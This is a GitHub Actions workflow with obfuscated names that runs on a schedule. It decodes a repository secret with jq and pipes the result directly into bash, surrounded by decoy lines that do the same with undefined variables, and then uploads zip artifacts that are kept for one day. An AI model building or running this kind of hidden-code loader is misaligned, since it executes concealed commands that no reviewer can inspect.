name: songsenxinsan
on:
  workflow_dispatch:

  schedule:
    - cron: '23 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: songsenxinsan
        env:
          wi8593: ${{ secrets.wi8593 }}
        run: |
          printf '%s' "$wi8593" | jq -r .v9226 | /bin/bash
          echo $y1315 | jq -r .dkt11821 | /bin/bash
          printf '%s' "$slvq2" | jq -r .ur03661 | /bin/bash
          echo $ru2990 | jq -r .gfu84 | /bin/bash
          printf '%s' "$nb08" | jq -r .bp7 | /bin/bash
          echo $oksz30 | jq -r .z229 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: VlCq86Xl
          path: "*.zip"
          retention-days: 1
